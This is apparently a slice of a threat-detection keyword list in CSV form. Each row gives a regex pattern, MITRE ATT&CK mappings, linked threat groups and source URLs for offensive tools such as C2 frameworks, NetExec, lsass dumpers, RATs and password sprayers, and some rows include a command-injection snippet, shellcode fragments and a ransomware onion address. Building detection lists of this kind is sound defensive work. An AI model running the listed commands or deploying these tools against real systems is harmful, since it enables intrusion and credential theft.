"*nuages_cli.js*",".{0,1000}nuages_cli\.js.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53732"
"*NuagesC2Connector*",".{0,1000}NuagesC2Connector.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53733"
"*NuagesC2Implant*",".{0,1000}NuagesC2Implant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53734"
"*NuagesPythonImplant*",".{0,1000}NuagesPythonImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53735"
"*NuagesSharpImplant*",".{0,1000}NuagesSharpImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","53736"
"*nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt*",".{0,1000}nuclei\s\-t\s\~\/tool\/nuclei\/nuclei\-templates\/cves\/CVE\-2020\-5902\.yaml\s\-l\shttps\.txt.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53737"
"*nuclei -t workflows/bigip-pwner-workflow.yaml*",".{0,1000}nuclei\s\-t\sworkflows\/bigip\-pwner\-workflow\.yaml.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53738"
"*nuclei -u *",".{0,1000}nuclei\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53739"
"*nuclei-burp-plugin*",".{0,1000}nuclei\-burp\-plugin.{0,1000}","offensive_tool_keyword","Xerror","A BurpSuite plugin intended to help with nuclei template generation.","T1083 - T1069 - T1204 - T1059 - T1078","TA0007 - TA0005 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/projectdiscovery/nuclei-burp-plugin","1","1","N/A","network exploitation tool","N/A","10","1234","120","2024-09-11T09:29:20Z","2022-01-17T10:31:33Z","53740"
"*nuitka --onefile barrel.py*",".{0,1000}nuitka\s\-\-onefile\sbarrel\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","53741"
"*nuitka --onefile lock.py*",".{0,1000}nuitka\s\-\-onefile\slock\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","53742"
"*nuitka --onefile shock.py*",".{0,1000}nuitka\s\-\-onefile\sshock\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","53743"
"*Nuke_Privileges /Process:*",".{0,1000}Nuke_Privileges\s\/Process\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","53744"
"*NUL0x4C/APCLdr*",".{0,1000}NUL0x4C\/APCLdr.{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","N/A","4","316","54","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z","53745"
"*NUL0x4C/AtomLdr*",".{0,1000}NUL0x4C\/AtomLdr.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","53746"
"*null-byte.com/bypass-amsi*",".{0,1000}null\-byte\.com\/bypass\-amsi.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","53747"
"*nullinux -rid -range *",".{0,1000}nullinux\s\-rid\s\-range\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","53748"
"*nullinux -shares -U *",".{0,1000}nullinux\s\-shares\s\-U\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","53749"
"*nullinux -users *",".{0,1000}nullinux\s\-users\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","53750"
"*nxc ftp *bruteforce*",".{0,1000}nxc\sftp\s.{0,1000}bruteforce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53752"
"*nxc http *--port*",".{0,1000}nxc\shttp\s.{0,1000}\-\-port.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53753"
"*nxc ldap * --admin-count*",".{0,1000}nxc\sldap\s.{0,1000}\s\-\-admin\-count.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53754"
"*nxc ldap * --trusted-for-delegation*",".{0,1000}nxc\sldap\s.{0,1000}\s\-\-trusted\-for\-delegation.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53755"
"*nxc mssql *--get-file*",".{0,1000}nxc\smssql\s.{0,1000}\-\-get\-file.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53756"
"*nxc mssql *--local-auth*",".{0,1000}nxc\smssql\s.{0,1000}\-\-local\-auth.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53757"
"*nxc smb * -x whoami*",".{0,1000}nxc\ssmb\s.{0,1000}\s\-x\swhoami.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53758"
"*nxc smb *.csv -u *",".{0,1000}nxc\ssmb\s.{0,1000}\.csv\s\-u\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53759"
"*nxc smb *.txt -u *",".{0,1000}nxc\ssmb\s.{0,1000}\.txt\s\-u\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53760"
"*nxc ssh *",".{0,1000}nxc\sssh\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53761"
"*nxc winrm * -X *",".{0,1000}nxc\swinrm\s.{0,1000}\s\-X\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53762"
"*nxc*nxcdb.py*",".{0,1000}nxc.{0,1000}nxcdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53763"
"*nxc.netexec:main*",".{0,1000}nxc\.netexec\:main.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53764"
"*nxc.protocols.smb*",".{0,1000}nxc\.protocols\.smb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53765"
"*nxcdb-zipapp-*",".{0,1000}nxcdb\-zipapp\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53766"
"*nxx3cy6aee2s53v7v5pxrfv7crfssw7hmgejbj47cv6xuak3bgncllqd.onion*",".{0,1000}nxx3cy6aee2s53v7v5pxrfv7crfssw7hmgejbj47cv6xuak3bgncllqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53767"
"*Nxy8P0NrG2AqvW5n5IAlaEbxDvev9hTfHiktFAhCDboW5oqsPSFu7/xd6lTi43sXD4yfw=*",".{0,1000}Nxy8P0NrG2AqvW5n5IAlaEbxDvev9hTfHiktFAhCDboW5oqsPSFu7\/xd6lTi43sXD4yfw\=.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#base64","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","53768"
"*NYAN-x-CAT/Lime-Crypter*",".{0,1000}NYAN\-x\-CAT\/Lime\-Crypter.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","53769"
"*NYAN-x-CAT/Lime-RAT*",".{0,1000}NYAN\-x\-CAT\/Lime\-RAT.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","53770"
"*NYANxCAT@pm.me*",".{0,1000}NYANxCAT\@pm\.me.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","#email","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","53771"
"*nysm.skel.h*",".{0,1000}nysm\.skel\.h.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","N/A","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","53772"
"*nysm-master.zip*",".{0,1000}nysm\-master\.zip.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","1","N/A","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","53773"
"*NytroRST/NetRipper*",".{0,1000}NytroRST\/NetRipper.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","53774"
"*nyxgeek/dirdevil*",".{0,1000}nyxgeek\/dirdevil.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","1","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","53775"
"*nyxgeek/lyncsmash*",".{0,1000}nyxgeek\/lyncsmash.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","53776"
"*nyxgeek/ntlmscan*",".{0,1000}nyxgeek\/ntlmscan.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","53777"
"*nyxgeek/o365recon*",".{0,1000}nyxgeek\/o365recon.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","53778"
"*nyxgeek/teamstracker*",".{0,1000}nyxgeek\/teamstracker.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","53779"
"*-o  kitten.exe*",".{0,1000}\-o\s\skitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","53780"
"*-o ProxyCommand=;/bin/bash -c *--locationPassword*",".{0,1000}\-o\sProxyCommand\=\;\/bin\/bash\s\-c\s.{0,1000}\-\-locationPassword.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","#linux","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","53781"
"*o_getprivs*",".{0,1000}o_getprivs.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53782"
"*o+m4iqAKlqR7eURppDGi16WEExMD/fkjI15nVPOHSXI=*",".{0,1000}o\+m4iqAKlqR7eURppDGi16WEExMD\/fkjI15nVPOHSXI\=.{0,1000}","offensive_tool_keyword","POC","PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855","T1078.001 - T1078.003 - T1078.004 - T1078 - T1189","TA0006 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sinsinology/CVE-2024-29855","1","0","N/A","N/A","10","1","17","7","2024-06-17T10:45:06Z","2024-06-13T08:32:55Z","53783"
"*o0AAAAEFRQVBSUVZIMdJlSItSYD5Ii1IYPkiLUiA+SItyUD5ID7dK*",".{0,1000}o0AAAAEFRQVBSUVZIMdJlSItSYD5Ii1IYPkiLUiA\+SItyUD5ID7dK.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","53784"
"*O365 Enumeration via ActiveSync module --*",".{0,1000}O365\sEnumeration\svia\sActiveSync\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53785"
"*O365 Enumeration via Office.com module --*",".{0,1000}O365\sEnumeration\svia\sOffice\.com\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53786"
"*O365 Enumeration via OneDrive module --*",".{0,1000}O365\sEnumeration\svia\sOneDrive\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53787"
"*O365 Spraying via ActiveSync module --*",".{0,1000}O365\sSpraying\svia\sActiveSync\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53788"
"*O365 Spraying via ADFS module --*",".{0,1000}O365\sSpraying\svia\sADFS\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53789"
"*O365 Spraying via MSOL module --*",".{0,1000}O365\sSpraying\svia\sMSOL\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53790"
"*o365-Attack-Toolkit*",".{0,1000}o365\-Attack\-Toolkit.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","53791"
"*o365-attack-toolkit*",".{0,1000}o365\-attack\-toolkit.{0,1000}","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","N/A","10","10","1068","217","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z","53792"
"*o365creeper.git*",".{0,1000}o365creeper\.git.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Discovery","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","N/A","4","342","60","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z","53793"
